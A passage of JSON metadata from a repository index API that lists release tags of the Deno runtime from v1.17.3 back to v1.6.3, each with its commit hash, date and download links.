pendency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.e